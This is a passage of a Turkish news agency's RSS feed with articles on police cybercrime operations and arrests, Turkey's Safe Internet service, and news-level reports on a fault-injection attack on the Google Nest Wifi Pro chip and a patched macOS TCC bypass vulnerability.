<p data-start="1223" data-end="1650"><strong data-start="1223" data-end="1254">Suç Yöntemleri ve Tespitler</strong><br>Şüphelilerin; sosyal medya platformları ve oltalama siteleri üzerinden <strong data-start="1326" data-end="1371">“görev yap kazanç sağla” ve “ürün satışı”</strong> temalarıyla dolandırıcılık yaptıkları, vatandaşların mobil bankacılık ve oyun hesaplarına yetkisiz erişim sağladıkları tespit edildi. Ayrıca yasa dışı bahis ve kumar oynattıkları, bahis sitelerinde para nakline aracılık ettikleri, reklam faaliyetlerinde bulundukları belirlendi.</p>
<p data-start="1652" data-end="1843">Açıklamada, şüphelilerin <strong data-start="1677" data-end="1719">müstehcen çocuk görüntüsü barındırdığı</strong>, <strong data-start="1721" data-end="1747">POS tefeciliği yaptığı</strong> ve <strong data-start="1751" data-end="1828">kişisel verilerin paylaşımı ile sorgulanmasına yönelik içerikler ürettiği</strong> de kaydedildi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_697ba93cd355a.webp" alt=""></p>
<p data-start="1845" data-end="2255"><strong data-start="1845" data-end="1877">19 İlde Eş Zamanlı Operasyon</strong><br>EGM Siber Suçlarla Mücadele Daire Başkanlığı ve <strong data-start="1926" data-end="1935">MASAK</strong> koordinasyonunda yürütülen çalışmalar kapsamında; <strong data-start="1986" data-end="2153">Adana, Adıyaman, Aydın, Bolu, Çanakkale, Denizli, Düzce, Gaziantep, Giresun, Gümüşhane, İstanbul, İzmir, Kayseri, Kırşehir, Kocaeli, Mardin, Sakarya, Samsun ve Van</strong> illerinde operasyonlar düzenlendi. Yakalanan şüpheliler hakkında savcılıklarca soruşturma başlatıldı.</p>
<p data-start="2257" data-end="2527"><strong data-start="2257" data-end="2289">“Hiçbir Yapıya Müsamaha Yok”</strong><br>Ali Yerlikaya, “Siber suçlara karşı yürüttüğümüz kararlı mücadeleyle, dijital alanda vatandaşlarımızın güvenliğini tehdit eden hiçbir yapıya müsamaha göstermiyoruz.” ifadelerini kullandı ve operasyonlarda görev alan ekipleri tebrik etti.</p>
<p data-start="2529" data-end="2703"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google Nest Wifi Pro’da Donanım Alarmı EM Glitching ile Qualcomm IPQ5018 üzerinde en yüksek ayrıcalık seviyesi ele geçirildi</title>
            <link>https://cumha.com.tr/google-nest-wifi-proda-donanim-alarmi-em-glitching-ile-qualcomm-ipq5018-uzerinde-en-yuksek-ayricalik-seviyesi-ele-gecirildi</link>
            <guid>https://cumha.com.tr/google-nest-wifi-proda-donanim-alarmi-em-glitching-ile-qualcomm-ipq5018-uzerinde-en-yuksek-ayricalik-seviyesi-ele-gecirildi</guid>
            <description><![CDATA[ Güvenlik araştırmacıları Cristofaro Mune ve Niek Timmers, Google Nest Wifi Pro cihazında kullanılan Qualcomm IPQ5018 SoC üzerinde yürüttükleri çalışmada, elektromanyetik hata enjeksiyonu saldırısıyla Secure Monitor seviyesinde kod yürütmenin mümkün olduğunu ortaya koydu. Araştırma, fiziksel erişim sağlandığında donanım tabanlı güvenlik katmanlarının da aşılabildiğini gösteriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_6975525f725f7.webp" length="72478" type="image/webp"/>
            
            <pubDate>Sun, 25 Jan 2026 02:15:11 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>google nest wifi pro em glitching saldırısı, qualcomm ipq5018 güvenlik açığı, secure monitor el3 ele geçirilmesi, emfi donanım saldırısı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Google Nest Wifi Pro cihazlarında kullanılan <strong data-start="588" data-end="623">Qualcomm IPQ5018 sistem-çipinin</strong>, elektromanyetik hata enjeksiyonu saldırılarına karşı yeterli fiziksel direnç göstermediği ortaya çıktı. Güvenlik araştırmacıları <strong data-start="754" data-end="789">Cristofaro Mune ve Niek Timmers</strong>, yürüttükleri çok aşamalı çalışmada, cihazın en yüksek ayrıcalık seviyesi olan <strong data-start="869" data-end="891">EL3 Secure Monitor</strong> bağlamında keyfi kod yürütmeyi başardıklarını açıkladı.</p>
<p></p>
<p data-start="949" data-end="1356">Araştırma, üç bölüm halinde yayımlandı. İlk bölümde çipin <strong data-start="1007" data-end="1052">EMFI saldırılarına karşı karakterizasyonu</strong>, ikinci bölümde <strong data-start="1069" data-end="1132">Secure Monitor içinde rastgele okuma ve yazma elde edilmesi</strong>, üçüncü bölümde ise <strong data-start="1153" data-end="1191">EL3 seviyesinde kalıcı kod yürütme</strong> ayrıntıları paylaşıldı. Araştırmacılar, “Amaç, donanım tabanlı güvenlik mekanizmalarının gerçek dünyada ne kadar dayanıklı olduğunu ölçmekti.” ifadelerini kullandı.</p>
<p data-start="1358" data-end="1752"><strong data-start="1358" data-end="1410">Elektromanyetik Hata Enjeksiyonu Nasıl Çalışıyor</strong><br>EMFI yöntemi, işlemci üzerine çok kısa süreli ve yüksek enerjili elektromanyetik darbeler uygulanmasına dayanıyor. Bu darbeler sayesinde işlemcinin yürüttüğü talimatların bozulabildiği belirtiliyor. Araştırmacılar, “Bir kontrol talimatı atlanabiliyor ya da beklenen işlem yerine farklı bir komut yürütülebiliyor.” değerlendirmesinde bulundu.</p>
<p data-start="1754" data-end="2217"><strong data-start="1754" data-end="1794">Secure Monitor Kontrolleri Atlatıldı</strong><br>Çalışmanın ikinci aşamasında, Secure Monitor tarafından uygulanan adres doğrulama mekanizmalarının hedef alındığı aktarıldı. Normal şartlarda yalnızca izin verilen bellek alanlarına erişim sağlayan <strong data-start="1993" data-end="2015">is_allowed_address</strong> benzeri kontrollerin, doğru zamanlamayla yapılan EMFI saldırıları sonucunda devre dışı bırakılabildiği kaydedildi. Bu sayede, <strong data-start="2142" data-end="2191">EL3 bağlamında rastgele 32 bit okuma ve yazma</strong> yapılabildiği vurgulandı.</p>
<p data-start="2219" data-end="2628"><strong data-start="2219" data-end="2254">XPU Yapılandırması Değiştirildi</strong><br>Araştırmanın en kritik aşamasında, TrustZone adres alanlarını koruyan <strong data-start="2325" data-end="2350">XPU yapılandırmasının</strong> yeniden programlanabildiği belirtildi. Araştırmacılar, “Tek bir başarılı glitch, Secure Monitor içinde keyfi uzunlukta kod yürütmek için yeterli.” ifadesini kullandı. Bu durumun, cihazın en korumalı yazılım katmanının tamamen kontrol altına alınması anlamına geldiği aktarıldı.</p>
<p data-start="2630" data-end="3004"><strong data-start="2630" data-end="2656">Saldırı Zor Ama Mümkün</strong><br>Araştırmacılar, saldırının pratikte yüksek beceri, hassas ekipman ve uzun deneme süreleri gerektirdiğini belirtti. Ortalama başarı süresinin <strong data-start="2798" data-end="2818">30 ila 40 dakika</strong> arasında değiştiği, çok sayıda yeniden başlatma ve zamanlama denemesi gerektiği kaydedildi. Buna rağmen, elde edilen sonucun teorik değil, pratik olarak uygulanabilir olduğu vurgulandı.</p>
<p data-start="3006" data-end="3416"><strong data-start="3006" data-end="3038">Donanım Güvenliği Tartışması</strong><br>Çalışma, gömülü ağ cihazlarında yalnızca yazılımsal önlemlerin yeterli olmayabileceğini ortaya koydu. Araştırmacılar, “TrustZone ve Secure Monitor gibi donanım destekli güvenlik katmanları bile fiziksel saldırılar karşısında aşılabilir.” değerlendirmesinde bulundu. Fiziksel erişim sağlanan cihazlarda, en yüksek ayrıcalık seviyesinin dahi ele geçirilebileceği uyarısı yapıldı.</p>
<p data-start="3418" data-end="3565"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ulaştırma ve Altyapı Bakanı Abdulkadir Uraloğlu: “Güvenli İnternet Hizmeti Abone Sayısı 55 Milyon Kişiyi Aştı”</title>
            <link>https://cumha.com.tr/ulastirma-ve-altyapi-bakani-abdulkadir-uraloglu-guvenli-internet-hizmeti-abone-sayisi-55-milyon-kisiyi-asti</link>
            <guid>https://cumha.com.tr/ulastirma-ve-altyapi-bakani-abdulkadir-uraloglu-guvenli-internet-hizmeti-abone-sayisi-55-milyon-kisiyi-asti</guid>
            <description><![CDATA[ Ulaştırma ve Altyapı Bakanı Abdulkadir Uraloğlu, 2025 Aralık sonu itibarıyla Güvenli İnternet Hizmeti’nden yararlanan abone sayısının 55 milyonu geçtiğini açıkladı. Uraloğlu, Güvenli İnternet Merkezi kapsamında bugüne kadar 1781 eğitimle 300 binden fazla kişiye ulaşıldığını, Güvenli İnternet Tırı ile ise 200’den fazla okulda 85 bin öğrenciye eğitim verildiğini bildirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_69752f2547a23.webp" length="51634" type="image/webp"/>
            
            <pubDate>Sat, 24 Jan 2026 23:45:36 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>güvenli internet hizmeti abone sayısı, güvenli internet merkezi eğitimleri, güvenli internet tırı okul ziyaretleri, çocuk ve aile profili internet</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="505" data-end="840">Ulaştırma ve Altyapı Bakanı Abdulkadir Uraloğlu, dijital ortamda çocukları ve aileleri korumaya yönelik yürütülen Güvenli İnternet Hizmeti’ne ilişkin güncel verileri paylaştı. Uraloğlu, 2011 yılında hayata geçirilen hizmetten faydalanan abone sayısının 2025 Aralık sonu itibarıyla <strong data-start="801" data-end="830">55 milyon kişiyi aştığını</strong> açıkladı.</p>
<p data-start="842" data-end="1233"><strong data-start="842" data-end="899">“Olumsuz İçeriklere Karşı Ücretsiz Koruma Sağlanıyor”</strong><br>Bakan Uraloğlu, Güvenli İnternet Hizmeti sayesinde abonelerin; uyuşturucu ticareti, şiddet, ırkçılık, nefret söylemi, terör propagandası, suç unsurları ve dolandırıcılık içeren sitelere karşı <strong data-start="1092" data-end="1139">talebe bağlı ve ücretsiz olarak korunduğunu</strong> ifade etti. Hizmet kapsamında Çocuk ve Aile olmak üzere iki ayrı profil sunulduğunu belirtti.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_69752f507bf20.webp" alt=""></p>
<p data-start="1235" data-end="1665"><strong data-start="1235" data-end="1279">Çocuk ve Aile Profilleri Nasıl Çalışıyor</strong><br>Abdulkadir Uraloğlu, Çocuk Profili’nin yalnızca güvenli olduğu onaylanmış sitelere erişim sağlayan <strong data-start="1379" data-end="1395">izinli liste</strong> sistemiyle çalıştığını, Aile Profili’nin ise zararlı içerik barındıran sitelere erişimi engelleyen <strong data-start="1495" data-end="1512">yasaklı liste</strong> yöntemini kullandığını kaydetti. Uraloğlu, kullanıcıların karşılaştıkları olumsuzlukları bildirme ve tedbir talep etme hakkına sahip olduğunu vurguladı.</p>
<p data-start="1667" data-end="2097"><strong data-start="1667" data-end="1728">“Güvenli İnternet Merkezi Bilinçli Kullanımı Destekliyor”</strong><br>2016 yılında kurulan Güvenli İnternet Merkezi’nin BTK bünyesinde faaliyet gösterdiğini hatırlatan Uraloğlu, merkezin Bilinçlendirme, İnternet Yardım ve İhbar Merkezleri aracılığıyla çocuklar ve ebeveynlere yönelik çalışmalar yürüttüğünü söyledi. Uraloğlu, “<a rel="noopener" target="_new" class="decorated-link" href="http://www.guvenliweb.org.tr">www.guvenliweb.org.tr<span aria-hidden="true" class="ms-0.5 inline-block align-middle leading-none"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" aria-hidden="true" data-rtl-flip="" class="block h-[0.75em] w-[0.75em] stroke-current stroke-[0.75]"></svg></span></a> üzerinden sağlanan içeriklerle toplumun geniş kesimlerine ulaşmaya devam ediyoruz.” dedi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_69752f3320099.webp" alt=""></p>
<p data-start="2099" data-end="2484"><strong data-start="2099" data-end="2149">1781 Eğitimle 300 Binden Fazla Kişiye Ulaşıldı</strong><br>Bakan Uraloğlu, Güvenli İnternet Merkezi’nin kuruluşundan bu yana <strong data-start="2216" data-end="2283">1781 eğitim düzenlediğini ve 300 binden fazla kişiye ulaştığını</strong> belirtti. Yalnızca bu yıl içinde gerçekleştirilen 138 eğitimle yaklaşık 22 bin kişinin bilgilendirildiğini kaydeden Uraloğlu, eğitimlerin çocuklar ve gençler için farkındalık oluşturduğunu ifade etti.</p>
<p data-start="2486" data-end="2807"><strong data-start="2486" data-end="2535">Güvenli İnternet Tırı 85 Bin Öğrenciye Ulaştı</strong><br>Güvenli İnternet Tırı projesine de değinen Uraloğlu, bugüne kadar <strong data-start="2602" data-end="2678">200’den fazla okulun ziyaret edildiğini ve 85 bin öğrenciye ulaşıldığını</strong> açıkladı. Uraloğlu, çocukların teknolojiyi doğru ve bilinçli kullanmaları için benzer projelerin yaygınlaştırılacağını bildirdi.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>macOS’ta Kritik Güvenlik Açığı Ortaya Çıktı: “TCC Koruması Tamamen Aşılabiliyor”</title>
            <link>https://cumha.com.tr/macosta-kritik-guvenlik-acigi-ortaya-cikti-tcc-korumasi-tamamen-asilabiliyor</link>
            <guid>https://cumha.com.tr/macosta-kritik-guvenlik-acigi-ortaya-cikti-tcc-korumasi-tamamen-asilabiliyor</guid>
            <description><![CDATA[ Apple’ın masaüstü işletim sistemi macOS’ta tespit edilen ve CVE-2025-43530 koduyla izlenen kritik güvenlik açığı, saldırganların Transparency, Consent and Control mekanizmasını tamamen devre dışı bırakmasına olanak tanıyor. Açık, kullanıcıdan izin almadan hassas verilere erişim sağlanmasına neden olurken Apple, macOS 26.2 sürümüyle sorunun giderildiğini duyurdu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_696f1e6d37e36.webp" length="61818" type="image/webp"/>
            
            <pubDate>Tue, 20 Jan 2026 09:20:16 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>macos tcc güvenlik açığı nedir, cve-2025-43530 nasıl çalışıyor, macos 26.2 güvenlik güncellemesi, apple tcc bypass zafiyeti</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Apple’ın macOS işletim sisteminde tespit edilen <strong data-start="530" data-end="555">kritik güvenlik açığı</strong>, kullanıcı gizliliğini korumak amacıyla geliştirilen <strong data-start="609" data-end="653">Transparency, Consent, and Control (TCC)</strong> mekanizmasının tamamen aşılmasına yol açtı. <strong data-start="698" data-end="716">CVE-2025-43530</strong> olarak kayda geçen zafiyetin, herhangi bir yönetici yetkisi gerektirmeden istismar edilebildiği bildirildi.</p>
<p></p>
<p data-start="826" data-end="1169"><strong data-start="826" data-end="868">VoiceOver Çerçevesi Üzerinden İstismar</strong><br>Güvenlik araştırmacıları, açığın <strong data-start="902" data-end="927">VoiceOver framework’ü</strong> ve <strong data-start="931" data-end="950">com.apple.scrod</strong> adlı sistem servisi üzerinden tetiklendiğini belirtti. Bu yöntemle saldırganların, Apple tarafından imzalanmış süreçlere kod enjekte edebildiği ve bu süreçler aracılığıyla <strong data-start="1123" data-end="1155">AppleScript çalıştırabildiği</strong> ifade edildi.</p>
<p data-start="1171" data-end="1641"><strong data-start="1171" data-end="1212">TOCTOU Yarış Koşulu ile Tam TCC Aşımı</strong><br>İstismarın temelinde, <strong data-start="1235" data-end="1273">Time-of-Check-Time-of-Use (TOCTOU)</strong> türü bir yarış koşulunun yer aldığı kaydedildi. Kod enjeksiyonu ile bu yarış koşulunun birlikte kullanılması sonucunda, saldırganların <strong data-start="1409" data-end="1538">Finder ile etkileşime girebildiği, dosya okuyabildiği, mikrofona erişebildiği ve keyfi AppleScript komutları çalıştırabildiği</strong> aktarıldı. Tüm bu işlemlerin kullanıcıya herhangi bir bildirim gönderilmeden gerçekleştiği vurgulandı.</p>
<p data-start="1643" data-end="1974"><strong data-start="1643" data-end="1683">Apple: Açık macOS 26.2 ile Kapatıldı</strong><br>Apple, güvenlik açığının <strong data-start="1709" data-end="1723">macOS 26.2</strong> sürümünde giderildiğini duyurdu. Şirket, <strong data-start="1765" data-end="1806">com.apple.private.accessibility.scrod</strong> yetkisinin artık <strong data-start="1824" data-end="1847">process audit token</strong> üzerinden doğrulandığını ve bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin ortadan kaldırıldığını açıkladı.</p>
<p data-start="1976" data-end="2294"><strong data-start="1976" data-end="2012">Kullanıcılara Güncelleme Çağrısı</strong><br>Apple, kullanıcıların sistemlerini en kısa sürede güncellemelerini önerdi. Güncellemenin, <strong data-start="2103" data-end="2148">macOS → System Settings → Software Update</strong> adımları izlenerek yapılabileceği hatırlatıldı. Güvenlik uzmanları, açığın kapsamı nedeniyle güncellemenin geciktirilmemesi gerektiğini belirtti.</p>
<p data-start="2296" data-end="2430"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>T.C. İçişleri Bakanı Ali Yerlikaya: “Siber suçlarla mücadelede son 5 günde 259 şüpheli yakalandı”</title>
            <link>https://cumha.com.tr/tc-icisleri-bakani-ali-yerlikaya-siber-suclarla-mucadelede-son-5-gunde-259-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/tc-icisleri-bakani-ali-yerlikaya-siber-suclarla-mucadelede-son-5-gunde-259-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, sosyal medya hesabından yaptığı açıklamada, siber suçlara yönelik son 5 gündür devam eden operasyonlarda 259 şüphelinin yakalandığını duyurdu. 37 il merkezli operasyonlarda nitelikli dolandırıcılık, çevrim içi çocuk müstehcenliği ve yasa dışı bahis suçlarına yönelik geniş kapsamlı çalışmalar yürütüldü. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_696e6fa5f1db4.webp" length="35058" type="image/webp"/>
            
            <pubDate>Mon, 19 Jan 2026 20:54:11 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>siber suç operasyonu kaç kişi yakalandı, ali yerlikaya siber suç açıklaması, yasa dışı bahis operasyonu hangi illerde, çevrim içi dolandırıcılık operasyonu detayları</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>T.C. İçişleri Bakanı <strong data-start="490" data-end="507">Ali Yerlikaya</strong>, Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele birimlerince yürütülen operasyonlara ilişkin detayları kamuoyuyla paylaştı. Yerlikaya, <strong data-start="644" data-end="723">siber suçlarla mücadele kapsamında son 5 günde 259 şüphelinin yakalandığını</strong> açıkladı.</p>
<p></p>
<p data-start="735" data-end="973"><strong data-start="735" data-end="774">Tutuklama ve Adli Kontrol Kararları</strong><br>Bakan Yerlikaya’nın açıklamasına göre, yakalanan şüphelilerden <strong data-start="838" data-end="858">131’i tutuklandı</strong>, <strong data-start="860" data-end="911">66’sı hakkında adli kontrol hükümleri uygulandı</strong>, diğer şüphelilerin işlemlerinin ise devam ettiği bildirildi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_696e6f9988db0.webp" alt=""></p>
<p data-start="975" data-end="1451"><strong data-start="975" data-end="1032">Dolandırıcılık ve Yasa Dışı Faaliyetler Tespit Edildi</strong><br>Şüphelilerin, sosyal medya platformları ve oltalama siteleri üzerinden <strong data-start="1104" data-end="1165">ürün satışı, hesap kiralama, ev ve araç satış ve kiralama</strong> temalarıyla dolandırıcılık yaptıkları, vatandaşların <strong data-start="1219" data-end="1288">mobil bankacılık ve oyun hesaplarına yetkisiz erişim sağladıkları</strong> belirlendi. Ayrıca, <strong data-start="1309" data-end="1350">yasa dışı bahis ve kumar oynattıkları</strong>, yasa dışı bahis sitelerinde <strong data-start="1380" data-end="1436">para nakline aracılık ettikleri ve reklam yaptıkları</strong> tespit edildi.</p>
<p data-start="1453" data-end="1698"><strong data-start="1453" data-end="1502">Çocuk Müstehcenliği ve Kişisel Veri İhlalleri</strong><br>Operasyonlar kapsamında bazı şüphelilerin <strong data-start="1545" data-end="1589">müstehcen çocuk görüntüleri barındırdığı</strong>, <strong data-start="1591" data-end="1638">kişisel verilerin paylaşımı ve sorgulanması</strong> konularında yasa dışı faaliyetlerde bulunduğu da açıklandı.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_696e6fb24f4bd.webp" alt=""></p>
<p data-start="1700" data-end="2070"><strong data-start="1700" data-end="1732">37 İlde Eş Zamanlı Operasyon</strong><br>EGM Siber Suçlarla Mücadele Daire Başkanlığı ve <strong data-start="1781" data-end="1807">MASAK koordinasyonunda</strong>, İl Emniyet Müdürlüklerine bağlı Siber Suçlarla Mücadele Şube Müdürlüklerince yürütülen çalışmalar kapsamında; Adana’dan Zonguldak’a kadar <strong data-start="1947" data-end="1982">37 ilde eş zamanlı operasyonlar</strong> düzenlendi. Yakalanan şüpheliler hakkında savcılıklar tarafından soruşturma başlatıldı.</p>
<p data-start="2072" data-end="2323"><strong data-start="2072" data-end="2110">“Şüpheli Durumlarda 112’yi Arayın”</strong><br>Bakan Yerlikaya, vatandaşlara çağrıda bulunarak, <strong data-start="2160" data-end="2251">siber suç ve suçlularla ilgili şüpheli durumlarda 112 Acil Çağrı Merkezi’nin aranmasını</strong> istedi. Yerlikaya, operasyonlarda görev alan tüm birimleri tebrik etti.</p>
<p data-start="2325" data-end="2501"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İçişleri Bakanı Ali Yerlikaya: “Siber suçlarla mücadelede son 5 günde 126 şüpheli yakalandı”</title>
            <link>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-siber-suclarla-mucadelede-son-5-gunde-126-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-siber-suclarla-mucadelede-son-5-gunde-126-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, siber suçlarla mücadele kapsamında son 5 günde 16 il merkezli operasyonlar düzenlendiğini açıkladı. Yasa dışı bahis, nitelikli dolandırıcılık ve çevrim içi çocuk müstehcenliği suçlarına yönelik operasyonlarda 126 şüphelinin yakalandığı, 16 kişinin tutuklandığı bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_69679960002eb.webp" length="19942" type="image/webp"/>
            
            <pubDate>Wed, 14 Jan 2026 16:26:44 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>siber suçlarla mücadele operasyonu, ali yerlikaya siber suç açıklaması, yasa dışı bahis operasyonu, çevrim içi dolandırıcılık soruşturması</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>İçişleri Bakanı <strong data-start="449" data-end="466">Ali Yerlikaya</strong>, sosyal medya hesabından yaptığı açıklamada, <strong data-start="512" data-end="539">Siber Suçlarla Mücadele</strong> kapsamında emniyet birimlerince son 5 gündür yürütülen operasyonlarda <strong data-start="610" data-end="642">126 şüphelinin yakalandığını</strong> duyurdu. Yerlikaya, operasyonlarla vatandaşların maddi ve manevi zarara uğramasının önüne geçildiğini belirtti.</p>
<p></p>
<p data-start="756" data-end="1111"><strong data-start="756" data-end="788">16 İlde Eş Zamanlı Operasyon</strong><br>Yasa dışı bahis, nitelikli dolandırıcılık, çevrim içi çocuk müstehcenliği ve tacizi suçlarına yönelik yürütülen operasyonların <strong data-start="916" data-end="1071">Adıyaman, Afyonkarahisar, Antalya, Çanakkale, Diyarbakır, Gaziantep, Giresun, İstanbul, İzmir, Kırıkkale, Kocaeli, Konya, Mersin, Ordu, Samsun ve Siirt</strong> illerinde gerçekleştirildiği açıklandı.</p>
<p data-start="1113" data-end="1389"><strong data-start="1113" data-end="1138">Adli Süreç Başlatıldı</strong><br>Ali Yerlikaya, yakalanan şüphelilerden <strong data-start="1178" data-end="1205">16’sının tutuklandığını</strong>, <strong data-start="1207" data-end="1261">41’i hakkında adli kontrol hükümleri uygulandığını</strong>, diğer şüphelilerle ilgili işlemlerin ise sürdüğünü kaydetti. Şüpheliler hakkında savcılıklar tarafından soruşturma başlatıldı.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_6967997116e55.webp" alt=""></p>
<p data-start="1391" data-end="1918"><strong data-start="1391" data-end="1414">Suçlamalar Netleşti</strong><br>Operasyonlar kapsamında yakalanan şüphelilerin; <strong data-start="1463" data-end="1504">yasa dışı bahis ve kumar oynattıkları</strong>, bahis sitelerinde <strong data-start="1524" data-end="1580">para nakline aracılık ettikleri ve reklam yaptıkları</strong>, <strong data-start="1582" data-end="1629">müstehcen çocuk görüntüleri barındırdıkları</strong>, sosyal medya ve <strong data-start="1647" data-end="1668">oltalama siteleri</strong> üzerinden ürün satışı ve kripto yatırım temalarıyla dolandırıcılık yaptıkları tespit edildi. Ayrıca şüphelilerin, <strong data-start="1783" data-end="1814">kişisel verilerin paylaşımı</strong>, <strong data-start="1816" data-end="1872">mobil bankacılık ve oyun hesaplarına yetkisiz erişim</strong> sağlama gibi suçlara karıştıkları belirlendi.</p>
<p data-start="1920" data-end="2287"><strong data-start="1920" data-end="1958">“Şüpheli Durumlarda 112’yi Arayın”</strong><br>Yerlikaya açıklamasında, “Şüphelendiğiniz bir durumda hemen <strong data-start="2019" data-end="2045">112 Acil Çağrı Merkezi</strong>’ni arayın. Biz gereğini yapalım.” ifadelerini kullandı. Operasyonların, <strong data-start="2118" data-end="2166">EGM Siber Suçlarla Mücadele Daire Başkanlığı</strong> ve <strong data-start="2170" data-end="2179">MASAK</strong> koordinesinde, İl Emniyet Müdürlükleri Siber Suçlarla Mücadele Şube Müdürlüklerince yürütüldüğü bildirildi.</p>
<p data-start="2289" data-end="2438"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İçişleri Bakanı Ali Yerlikaya: “14 ilde siber dolandırıcılığa yönelik operasyonlarda 90 şüpheli yakalandı”</title>
            <link>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-14-ilde-siber-dolandiriciliga-yoenelik-operasyonlarda-90-supheli-yakalandi</link>
            <guid>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-14-ilde-siber-dolandiriciliga-yoenelik-operasyonlarda-90-supheli-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, jandarma tarafından son iki haftada 14 ilde siber dolandırıcılık suçuna yönelik düzenlenen operasyonlarda 90 şüphelinin yakalandığını açıkladı. Şüphelilerin hesaplarında 2020-2025 yılları arasında 685 milyon liralık işlem hacmi tespit edilirken, 39 kişinin tutuklandığı, 46 kişi hakkında adli kontrol uygulandığı bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_696393adcdae5.webp" length="42344" type="image/webp"/>
            
            <pubDate>Sun, 11 Jan 2026 15:12:52 +0300</pubDate>
            <dc:creator>Sıla Akçaat</dc:creator>
            <media:keywords>siber dolandırıcılık operasyonu 14 il, ali yerlikaya siber suç açıklaması, jandarma siber dolandırıcılık operasyonu, 685 milyon tl işlem hacmi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="484" data-end="811">İçişleri Bakanı <strong data-start="515" data-end="532">Ali Yerlikaya</strong>, sosyal medya hesabından yaptığı açıklamada, <strong data-start="578" data-end="694">jandarma tarafından siber dolandırıcılık suçuna yönelik yürütülen operasyonlarda önemli sonuçlar elde edildiğini</strong> duyurdu. Yerlikaya, son iki haftadır 14 ilde gerçekleştirilen çalışmalarda <strong data-start="770" data-end="801">90 şüphelinin yakalandığını</strong> belirtti.</p>
<p data-start="813" data-end="1182"><strong data-start="813" data-end="861">685 Milyon Liralık İşlem Hacmi Tespit Edildi</strong><br>Ali Yerlikaya, şüphelilerin <strong data-start="890" data-end="1002">2020-2025 yılları arasında hesaplarında toplam 685 milyon liralık işlem hacmi bulunduğunun tespit edildiğini</strong> açıkladı. Yakalanan şüphelilerden <strong data-start="1037" data-end="1063">39’unun tutuklandığını</strong>, <strong data-start="1065" data-end="1120">46’sı hakkında adli kontrol hükümleri uygulandığını</strong>, diğer şüphelilerle ilgili işlemlerin ise sürdüğünü kaydetti.</p>
<p data-start="1184" data-end="1593"><strong data-start="1184" data-end="1216">14 İlde Eş Zamanlı Operasyon</strong><br>Operasyonların; <strong data-start="1233" data-end="1353">İstanbul, Ankara, Yalova, Kütahya, Diyarbakır, Zonguldak, Edirne, Muğla, Siirt, Ordu, Mersin, Ağrı, Aksaray ve Hatay</strong> illerinde gerçekleştirildiği bildirildi. Çalışmaların, <strong data-start="1409" data-end="1581">Cumhuriyet Başsavcılıkları, Jandarma Genel Komutanlığı Siber Suçlarla Mücadele Daire Başkanlığı ve MASAK koordinesinde İl Jandarma Komutanlıkları tarafından yürütüldüğü</strong> belirtildi.</p>
<p data-start="1595" data-end="2164"><strong data-start="1595" data-end="1643">Çok Sayıda Dolandırıcılık Yöntemi Kullanıldı</strong><br>Yerlikaya, şüphelilerin <strong data-start="1668" data-end="1755">vatandaşlara ait kişisel bilgileri yasa dışı yollarla ele geçirerek kullandıklarını</strong> ifade etti. Şüphelilerin, sosyal medya üzerinden <strong data-start="1805" data-end="1936">“yatırım danışmanlığı, sınavsız ehliyet, akülü araba, mobilya, araç yedek parçası, elektronik eşya satışı ve bungalov kiralama”</strong> gibi sahte ilanlarla dolandırıcılık yaptığı, <strong data-start="1982" data-end="2011">yasa dışı bahis oynattığı</strong>, suçtan elde edilen paranın <strong data-start="2040" data-end="2067">nakline aracılık ettiği</strong> ve <strong data-start="2071" data-end="2149">banka hesaplarından bilgileri dışında para çekerek haksız kazanç sağladığı</strong> tespit edildi.</p>
